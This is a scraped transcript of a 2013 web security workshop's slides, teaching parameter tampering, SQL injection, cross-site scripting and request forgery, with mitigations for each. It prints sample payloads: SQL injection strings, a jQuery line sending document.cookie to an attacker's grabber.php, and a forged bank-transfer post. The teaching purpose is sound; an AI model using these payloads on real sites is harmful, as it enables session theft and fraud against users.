Presentation is loading. Please wait.

Presentation is loading. Please wait.

WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.

Published byCory Barker Modified over 9 years ago

Similar presentations

Presentation on theme: "WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand."— Presentation transcript:

1 WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand

2 Introduction and Background

3 Tools  Internet Browser (Firefox has the nicest plugins)  Python or other scripting language  BurpSuite

4 Targets  Web Applications  Web Pages  Databases  Goals  Steal data  Gain access to system  Bypass authentication barriers

5 Web Servers  Web applications are Internet interfaces to web servers  Example web servers:  Apache  IIS  Nginx  Self contained servers (often called web services)

6 URLs  Most familiar style: URL maps to file system  www.site.com/f1/f2/p.html  The above maps to /var/www/f1/f2/p.html  RESTful Routing embeds resources in URL  www.site.com/users/create  The above maps to a function that creates a new user  More common for web services

7 HTTP  Protocol that provides the way to communicate over the web  It is stateless and asynchronous  Simulate state with sessions  Your browser keeps session information  The server uses this to keep track of your state  Example: Shopping Cart  Session has an ID tied to a cart in database  Every page you visit has to establish your identity

8 HTTP Requests  Methods  GET – asks server for information  POST – gives server data  PUT – tells server to modify or create data  DELETE – tells server to delete data  Examples  GET shows your profile on a webpage  POST is used to upload your picture  PUT changes your bio  DELETE gets rid of the embarrasssing picture

9 HTTP Request Parameters  Along with URL and method, requests carry data in the form of parameters  GET  Visible from URL: http://www.facespace.com/profile.php?id=13  Can be used easily in hyperlinks  POST  Not visible in URL or link, embedded in request  We can still alter these

10 Parameter Tampering

11 Overview  Very basic attack on HTTP protocol  Exploits server’s misguided trust in data from user

12 Example – Game High Scores Web Server Give me a game Here’s one

13 Example – Game High Scores Web Server Game (Local) Score

14 Example – Game High Scores Web Server Game (Local) Score Nice! Here’s how I did…

15 Attack – Game High Scores Web Server Game (Local) Score Nice! Here’s how I SAY I did…

16 Example – PayPal Merchant I want to buy this Pay for it with PayPal

17 Example – PayPal PayPal Here’s how much I owe you. Merchant Sounds good.

18 Example – PayPal PayPal Tell them you paid Thanks! I paid Merchant

19 Attack – PayPal PayPal Here’s how much I say I owe you. Merchant Sounds good.

20 Attack – PayPal PayPal Tell them you paid Thanks! I paid what you said Merchant

21 Tools and Demo  Firefox  TamperData  Live HTTP Headers  BurpSuite

22 Mitigation  Never trust the integrity of data that a user can edit  Web services can allow servers to talk and bypass the user

23 SQL Injection

24 Overview  Injection attacks – user takes advantage of poor input sanitization to insert data into the client application that is passed (and trusted) to a server application  SQL injection – users exploits the trust that the database engine has in the web server by giving the web server data that alters a query  Another injection is command injection – targets system process execution

25 Example  To select a user: SELECT * from users WHERE name = 'Bob';  The username is determined at runtime, so let’s make it: SELECT * from users WHERE name = '$name';  For example, if $name is “Joe”: SELECT * from users WHERE name = 'Joe';

26 Attack  Let’s give it a string that will change the query once substituted into it.  Attack string is: ' or '1'='1  When plugged into the query, the following is produced: SELECT * from users where NAME = '' or '1'='1';  This always returns a row

27 Another injection  SELECT money from users where id = $id;  We control the $id variable  Utilize UNION to forge our own data: 0 UNION SELECT 1000000  Resulting query: SELECT money from users where id = 0 UNION SELECT 1000000;

28 Demo

29 Mitigation  Parameterized queries. In PHP:  Stupid way: $db->query(“select user where id = $id”);  Smart way: $db->prepare(“select user where id = :id”); $db->execute(array(‘:id’ => $id));  This is better because the DB doesn’t need to trust the web server since the actual query doesn’t change  DON’T FILTER, USE PREPARED STATEMENTS / PARAMETERIZED QUERIES

30 Cross Site Scripting

31 Overview  Exploits the trust a browser places in a site by running code (usually JS) in browser  Reflected: user is tricked into running some code  In URL: site.com/?msg= …  Pasted into address bar  Stored: the malicious code is stored persistently on the compromised website  Unfiltered comments  SQL injections allowing user control where not intended

32 Payloads and Goals  Steal cookies  Open a hidden IFRAME  Spam advertisements  Redirect to another page  Click jacking  Many more

33 Example Attack  Uses jQuery  $.get(‘www.mysite.com/grabber.php?c=‘ + document.cookie);  A get request is made to our site, which stores the parameter c in a log file, or autopwns them. Whatever.

34 Demo

35 Mitigation  Developers  Don’t allow users to post HTML  Keep an eye out for places where attackers could modify what other peoples’ browsers render  Users  Use NoScript or similar whitelisting plugin  Don’t click or paste a link with JavaScript in it

36 Cross Server Request Forgery

37 Overview  Similar to XSS  Exploits trust that servers place in browsers  It’s very difficult for a web server to know whether a request your computer sent it was sent with your knowledge or approval  Different than XSS, but XSS is often an attack vector for CSRF

38 Example Attack  Images  XSS $.post(‘bank.com/transfer.php’, {to: ‘me’, amount: 1000000});

39 Demo

40 Mitigation  Only trust requests from your domain  Use CSRF protection tokens – included in many web frameworks  Use the appropriate HTTP request, don’t use GET for something that modifies data  Not much to do as a user

41 General Tips

42 Look at Requests!  Use TamperData, Firebug, Chrome Developer Tools, Live HTTP Headers, BurpSuite, etc.  The idea is to find things we can alter  The goal is to invalidate trust that the developer put in us

43 Inject Everything  If your data goes into a database query, try SQL injection  If you think it’s piping your input into a program, try command injection via && and the like  If it looks like it’s rendering HTML, try some JavaScript

44 Questions?

45 CTF Time  Presented by Scott Hand (utdallas.edu/~shand)

Download ppt "WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand."

Similar presentations

Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.

HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
TEXSAW 2012 WEB SECURITY CRASH COURSE TexSAW 2012 Scott Hand.

TEXSAW 2012 WEB SECURITY CRASH COURSE TexSAW 2012 Scott Hand.
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane

©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
WebGoat & WebScarab “What is computer security for $1000 Alex?”

WebGoat & WebScarab “What is computer security for $1000 Alex?”
Servlets and a little bit of Web Services Russell Beale.

Servlets and a little bit of Web Services Russell Beale.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
1 The World Wide Web. 2  Web Fundamentals  Pages are defined by the Hypertext Markup Language (HTML) and contain text, graphics, audio, video and software.

1 The World Wide Web. 2  Web Fundamentals  Pages are defined by the Hypertext Markup Language (HTML) and contain text, graphics, audio, video and software.
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.

Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
1 CS428 Web Engineering Lecture 18 Introduction (PHP - I)

1 CS428 Web Engineering Lecture 18 Introduction (PHP - I)
Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)
Workshop 3 Web Application Security Li Weichao March 14 2014.

Workshop 3 Web Application Security Li Weichao March
Cosc 4765 Server side Web security. Web security issues From Cenzic Vulnerability report 2014 https://info.cenzic.com/2013-Application-Security-Trends-Report.html.

Cosc 4765 Server side Web security. Web security issues From Cenzic Vulnerability report
Lets Make our Web Applications Secure. Dipankar Sinha Project Manager Infrastructure and Hosting.

Lets Make our Web Applications Secure. Dipankar Sinha Project Manager Infrastructure and Hosting.
+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.

+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.
WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas.

WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas.
Introduction to InfoSec – Recitation 7 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

Introduction to InfoSec – Recitation 7 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

Similar presentations

Ads by Google